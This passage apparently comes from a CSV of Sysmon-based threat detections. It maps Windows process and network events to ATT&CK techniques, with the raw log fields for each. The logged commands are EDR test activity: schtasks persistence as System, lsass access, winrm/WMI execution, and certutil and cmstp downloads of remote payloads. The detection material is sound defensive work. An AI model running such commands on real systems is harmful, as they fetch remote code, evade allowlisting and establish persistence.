cmd /c schtasks /create /tn "mysc" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru "System" /f
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1553028158.70443,2019-03-20T00:42:38.704430+04:00,,Threat,Low,Found User (EXAMPLE\user01) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /c msg * "hello from run key" ),1,"
1
5
4
1
0
0x8000000000000000
1966330
Microsoft-Windows-Sysmon/Operational
PC01.example.corp
2019-03-19 20:42:38.043
365ABB72-543E-5C91-0000-001009C90300
3068
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\System32\cmd.exe" /c msg * "hello from run key"
C:\Windows\system32\
EXAMPLE\user01
365ABB72-5417-5C91-0000-002035340300
0x33435
1
High
MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-543D-5C91-0000-001099A60300
2984
C:\Windows\explorer.exe
C:\Windows\Explorer.EXE
",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[T1003] Credential Dumping - Process Access,1556608980.899263,2019-04-30T11:23:00.899263+04:00,,Threat,High,[T1003] Credential Dumping - Process Access,10,"
10
3
4
10
0
0x8000000000000000
8341
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-04-30 07:23:00.883
365ABB72-F7C9-5CC7-0000-0010BF010E00
3772
1088
D:\m.exe
365ABB72-F6A1-5CC7-0000-001072590000
492
C:\Windows\system32\lsass.exe
0x1410
C:\Windows\SYSTEM32\ntdll.dll+4595c|C:\Windows\system32\KERNELBASE.dll+8185|UNKNOWN(01770343)|UNKNOWN(0176FF9D)|UNKNOWN(0176F8EC)|UNKNOWN(00397486)|UNKNOWN(003973A0)|UNKNOWN(003978A3)|C:\Windows\system32\kernel32.dll+4ef8c|C:\Windows\SYSTEM32\ntdll.dll+6367a|C:\Windows\SYSTEM32\ntdll.dll+6364d
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436080.38552,2019-07-30T01:34:40.385520+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c schtasks /create /tn "mysc" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru "System" /f ),1,"
1
5
4
1
0
0x8000000000000000
5000
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:34:40.243
747F3D96-6670-5D3F-0000-001099048F00
2916
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd /c schtasks /create /tn "mysc" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru "System" /f
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-6609-5D3F-0000-00109FBF8500
1208
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1564436076.548587,2019-07-30T01:34:36.548587+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\calc.exe ) through command line ( calc ),1,"
1
5
4
1
0
0x8000000000000000
4998
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:34:36.528
747F3D96-666C-5D3F-0000-00104BB78E00
3872
C:\Windows\System32\calc.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Calculator
Microsoft® Windows® Operating System
Microsoft Corporation
calc
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729
747F3D96-6642-5D3F-0000-001044A68A00
2996
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1587853177.495367,2020-04-26T02:19:37.495367+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh)",1,"
1
5
4
1
0
0x8000000000000000
27803
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-04-25 22:19:27.149
747F3D96-B76F-5EA4-0000-0010624D0600
5840
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-B767-5EA4-0000-00209BD30100
0x1d39b
1
Medium
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-B769-5EA4-0000-001000800300
4472
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1564436076.548587,2019-07-30T01:34:36.548587+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\calc.exe ) through command line ( calc ),1,"
1
5
4
1
0
0x8000000000000000
4998
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:34:36.528
747F3D96-666C-5D3F-0000-00104BB78E00
3872
C:\Windows\System32\calc.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Calculator
Microsoft® Windows® Operating System
Microsoft Corporation
calc
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729
747F3D96-6642-5D3F-0000-001044A68A00
2996
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1587853177.495367,2020-04-26T02:19:37.495367+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh )",1,"
1
5
4
1
0
0x8000000000000000
27803
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-04-25 22:19:27.149
747F3D96-B76F-5EA4-0000-0010624D0600
5840
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-B767-5EA4-0000-00209BD30100
0x1d39b
1
Medium
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-B769-5EA4-0000-001000800300
4472
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1587853177.495367,2020-04-26T02:19:37.495367+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh )",1,"
1
5
4
1
0
0x8000000000000000
27803
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-04-25 22:19:27.149
747F3D96-B76F-5EA4-0000-0010624D0600
5840
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-B767-5EA4-0000-00209BD30100
0x1d39b
1
Medium
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-B769-5EA4-0000-001000800300
4472
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1059 ] wscript or cscript running script,1564436075.91801,2019-07-30T01:34:35.918010+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line (cscript //nologo "C:\Windows\System32\winrm.vbs" i c wmicimv2/Win32_Process @{CommandLine="calc"}) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine="calc"}) in directory : ( C:\Windows\system32\ )",1,"
1
5
4
1
0
0x8000000000000000
4994
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:34:35.763
747F3D96-666B-5D3F-0000-0010EF858E00
264
C:\Windows\System32\cscript.exe
5.812.10240.16384
Microsoft ® Console Based Script Host
Microsoft ® Windows Script Host
Microsoft Corporation
cscript //nologo "C:\Windows\System32\winrm.vbs" i c wmicimv2/Win32_Process @{CommandLine="calc"}
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=0E3C0779D8EAAD3B00363D7890DDC8272B510D49,MD5=A45586B3A5A291516CD10EF4FD3EE768,SHA256=59D3CDC7D51FA34C6B27B8B04EA17992955466EB25022B7BD64880AB35DF0BBC,IMPHASH=2B44D2206B9865383429E9C1524F1CAC
747F3D96-666B-5D3F-0000-001033648E00
1580
C:\Windows\System32\cmd.exe
cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine="calc"}
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1564436075.91801,2019-07-30T01:34:35.918010+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cscript.exe ) through command line ( cscript //nologo "C:\Windows\System32\winrm.vbs" i c wmicimv2/Win32_Process @{CommandLine="calc"} ),1,"
1
5
4
1
0
0x8000000000000000
4994
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:34:35.763
747F3D96-666B-5D3F-0000-0010EF858E00
264
C:\Windows\System32\cscript.exe
5.812.10240.16384
Microsoft ® Console Based Script Host
Microsoft ® Windows Script Host
Microsoft Corporation
cscript //nologo "C:\Windows\System32\winrm.vbs" i c wmicimv2/Win32_Process @{CommandLine="calc"}
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=0E3C0779D8EAAD3B00363D7890DDC8272B510D49,MD5=A45586B3A5A291516CD10EF4FD3EE768,SHA256=59D3CDC7D51FA34C6B27B8B04EA17992955466EB25022B7BD64880AB35DF0BBC,IMPHASH=2B44D2206B9865383429E9C1524F1CAC
747F3D96-666B-5D3F-0000-001033648E00
1580
C:\Windows\System32\cmd.exe
cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine="calc"}
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1059 ] wscript or cscript running script,1564436075.878709,2019-07-30T01:34:35.878709+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line (cscript //nologo "C:\Windows\System32\winrm.vbs" qc -q) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd /c winrm qc -q) in directory : ( C:\Windows\system32\ )",1,"
1
5
4
1
0
0x8000000000000000
4993
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:34:35.663
747F3D96-666B-5D3F-0000-00102F7F8E00
3224
C:\Windows\System32\cscript.exe
5.812.10240.16384
Microsoft ® Console Based Script Host
Microsoft ® Windows Script Host
Microsoft Corporation
cscript //nologo "C:\Windows\System32\winrm.vbs" qc -q
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=0E3C0779D8EAAD3B00363D7890DDC8272B510D49,MD5=A45586B3A5A291516CD10EF4FD3EE768,SHA256=59D3CDC7D51FA34C6B27B8B04EA17992955466EB25022B7BD64880AB35DF0BBC,IMPHASH=2B44D2206B9865383429E9C1524F1CAC
747F3D96-666B-5D3F-0000-001051638E00
5840
C:\Windows\System32\cmd.exe
cmd /c winrm qc -q
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436075.34771,2019-07-30T01:34:35.347710+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine="calc"} ),1,"
1
5
4
1
0
0x8000000000000000
4991
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:34:35.285
747F3D96-666B-5D3F-0000-001033648E00
1580
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine="calc"}
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-6609-5D3F-0000-00109FBF8500
1208
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1564436075.34771,2019-07-30T01:34:35.347710+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine="calc"} ),1,"
1
5
4
1
0
0x8000000000000000
4991
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:34:35.285
747F3D96-666B-5D3F-0000-001033648E00
1580
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine="calc"}
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-6609-5D3F-0000-00109FBF8500
1208
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436075.337716,2019-07-30T01:34:35.337716+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c winrm qc -q ),1,"
1
5
4
1
0
0x8000000000000000
4990
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:34:35.246
747F3D96-666B-5D3F-0000-001051638E00
5840
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd /c winrm qc -q
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-6609-5D3F-0000-00109FBF8500
1208
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1053] Scheduled Task - Process,1553029831.815313,2019-03-20T01:10:31.815313+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\schtasks.exe ) through command line ( C:\Windows\system32\schtasks.exe /delete /f /TN "Microsoft\Windows\Customer Experience Improvement Program\Uploader" ),1,"
1
5
4
1
0
0x8000000000000000
1966503
Microsoft-Windows-Sysmon/Operational
PC01.example.corp
2019-03-19 21:00:01.529
365ABB72-5851-5C91-0000-00107D050A00
2716
C:\Windows\System32\schtasks.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Manages scheduled tasks
Microsoft® Windows® Operating System
Microsoft Corporation
C:\Windows\system32\schtasks.exe /delete /f /TN "Microsoft\Windows\Customer Experience Improvement Program\Uploader"
C:\Windows\system32\
NT AUTHORITY\SYSTEM
365ABB72-528D-5C91-0000-0020E7030000
0x3e7
0
System
MD5=2003E9B15E1C502B146DAD2E383AC1E3,IMPHASH=D92C80D49382091310FB8DB089F856A9
365ABB72-5851-5C91-0000-0010E1030A00
2772
C:\Windows\System32\wsqmcons.exe
C:\Windows\System32\wsqmcons.exe
",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[T1202] Indirect Command Execution,1564436070.807635,2019-07-30T01:34:30.807635+04:00,,Threat,Medium,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\forfiles.exe) tried accessing powershell history through commandline ( forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe ),1,"
1
5
4
1
0
0x8000000000000000
4988
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:34:30.462
747F3D96-6666-5D3F-0000-0010AE068E00
1464
C:\Windows\System32\forfiles.exe
10.0.17763.1 (WinBuild.160101.0800)
ForFiles - Executes a command on selected files
Microsoft® Windows® Operating System
Microsoft Corporation
forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=B7002C1601C326ED60C38E23366E5E8C919F326A,MD5=6E9F3CBB041D0670E2AC3378C3360045,SHA256=FA84D5B043EAD140FE304CBC71A9BFB3D24D3542FAB45DB65606C47808BD9272,IMPHASH=BB3BC1A3FEF88F916302D61DDC886F80
747F3D96-6666-5D3F-0000-001016F78D00
2244
C:\Windows\System32\cmd.exe
cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,1553029201.518992,2019-03-20T01:00:01.518992+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) with commandline ( whoami) ,1,"
1
5
4
1
0
0x8000000000000000
1966501
Microsoft-Windows-Sysmon/Operational
PC01.example.corp
2019-03-19 20:58:44.187
365ABB72-5804-5C91-0000-001044DE0900
2456
C:\Windows\System32\whoami.exe
6.1.7600.16385 (win7_rtm.090713-1255)
whoami - displays logged on user information
Microsoft® Windows® Operating System
Microsoft Corporation
whoami
C:\Windows\system32\
NT AUTHORITY\SYSTEM
365ABB72-528D-5C91-0000-0020E7030000
0x3e7
2
System
MD5=0EBF71E33EF09CA65D9683AFA999C473,IMPHASH=C5352B949915AB8CD5E1844790D19274
365ABB72-57FB-5C91-0000-00104FD40900
2128
C:\osk.exe
"c:\osk.exe"
",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436070.258082,2019-07-30T01:34:30.258082+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe ),1,"
1
5
4
1
0
0x8000000000000000
4986
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:34:30.221
747F3D96-6666-5D3F-0000-001016F78D00
2244
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-6609-5D3F-0000-00109FBF8500
1208
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436065.269897,2019-07-30T01:34:25.269897+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf ),1,"
1
5
4
1
0
0x8000000000000000
4983
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:34:25.180
747F3D96-6661-5D3F-0000-00107AB88D00
6428
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-6609-5D3F-0000-00109FBF8500
1208
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1564436065.202954,2019-07-30T01:34:25.202954+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) ran process C:\Windows\System32\certutil.exe and initiated a network connection from hostname ( MSEDGEWIN10.home ) and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3,"
3
5
4
3
0
0x8000000000000000
4982
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
Suspicious NetCon
2019-07-29 21:34:20.735
747F3D96-665C-5D3F-0000-0010E37B8D00
4520
C:\Windows\System32\certutil.exe
MSEDGEWIN10\IEUser
tcp
true
false
10.0.2.15
MSEDGEWIN10.home
49833
false
151.101.0.133
443
https
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1564436061.867545,2019-07-30T01:34:21.867545+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) ran process C:\Windows\System32\certutil.exe and initiated a network connection from hostname ( MSEDGEWIN10.home ) and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3,"
3
5
4
3
0
0x8000000000000000
4981
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
Suspicious NetCon
2019-07-29 21:34:20.619
747F3D96-665C-5D3F-0000-0010E37B8D00
4520
C:\Windows\System32\certutil.exe
MSEDGEWIN10\IEUser
tcp
true
false
10.0.2.15
MSEDGEWIN10.home
49832
false
151.101.0.133
443
https
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1564436061.8671,2019-07-30T01:34:21.867100+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\certutil.exe) with commandline ( certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 )",1,"
1
5
4
1
0
0x8000000000000000
4980
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:34:20.410
747F3D96-665C-5D3F-0000-0010E37B8D00
4520
C:\Windows\System32\certutil.exe
10.0.17763.1 (WinBuild.160101.0800)
CertUtil.exe
Microsoft® Windows® Operating System
Microsoft Corporation
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4
747F3D96-665C-5D3F-0000-0010096B8D00
7088
C:\Windows\System32\cmd.exe
cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564436061.8671,2019-07-30T01:34:21.867100+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\certutil.exe ) through command line ( certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 ),1,"
1
5
4
1
0
0x8000000000000000
4980
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:34:20.410
747F3D96-665C-5D3F-0000-0010E37B8D00
4520
C:\Windows\System32\certutil.exe
10.0.17763.1 (WinBuild.160101.0800)
CertUtil.exe
Microsoft® Windows® Operating System
Microsoft Corporation
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4
747F3D96-665C-5D3F-0000-0010096B8D00
7088
C:\Windows\System32\cmd.exe
cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436060.262273,2019-07-30T01:34:20.262273+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 ),1,"
1
5
4
1
0
0x8000000000000000
4978
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:34:20.134
747F3D96-665C-5D3F-0000-0010096B8D00
7088
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1
C:\Windows\system32\
MSEDGEWIN10\IEUser
